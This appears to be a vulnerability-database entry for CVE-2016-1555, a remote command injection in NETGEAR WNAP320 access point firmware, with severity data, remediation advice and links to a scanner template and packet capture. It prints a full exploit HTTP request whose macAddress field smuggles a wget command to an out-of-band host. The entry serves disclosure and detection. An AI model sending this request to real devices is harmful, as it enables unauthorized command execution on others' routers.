| Title | NETGEAR WNAP320 Access Point Firmware - Remote Command Injection |
|---|---|
| Author | gy741 |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device. |
| Remediation | Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.93967 |
| CVE ID | CVE-2016-1555 |
| CWE ID | CWE-77 |
| Tags | cve2016 cve seclists packetstorm netgear rce oast router kev vkev vuln |
NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
POST /boardDataWW.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:129.0) Gecko/20100101 Firefox/129.0
Connection: close
Content-Length: 115
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
macAddress=112233445566%3Bwget+http%3A%2F%2Fd5jqjahle0o1sc65on701bujk7e1t4ema.oast.me%23®info=0&writeData=Submit
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2016/CVE-2016-1555.yaml
🦈 Packet Capture: ⬇️ Download cve-2016-1555.pcap
N/AN/A